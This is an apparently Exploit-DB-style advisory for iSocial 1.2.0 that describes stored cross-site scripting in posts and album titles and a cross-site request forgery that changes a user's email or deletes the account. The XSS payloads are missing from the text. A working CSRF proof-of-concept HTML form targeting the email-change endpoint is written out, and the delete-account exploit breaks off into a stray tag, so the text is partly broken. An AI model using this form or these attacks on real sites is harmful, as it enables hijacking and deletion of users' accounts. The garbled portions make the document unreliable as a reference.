# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2
# Version: 1.2.0
# Tested on: Kali linux
# POC 1 : Cross-Site scripting:
1) Create your account and navigate to "write post".
2) Put this payload and click on "post" :
3) You will have an alert box in your page .
# POC 2 : Cross-Site Scripting:
1) Navigate to "Albums" and click on "create album"
2) In title field , put this payload :
3) In both cases , the payload will be executed after someone opens your
album or your profile.
# POC 3 : Cross-Site Request Forgery:
# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability .
# Attacker can easily change user's email or delete user's account .
# Change email Exploit :
<title>CSRF POC</title>
<form action="http://Target/isocial/demo/services/actionssetting/email" method="POST">
<input type="hidden" name="em" value="lord2@gmail.com" />
# Result :
# html"The information has been updated"
# status"OK"
# message""
# Delete account Exploit:
<img src="https://www.exploit-db.com/exploits/44692/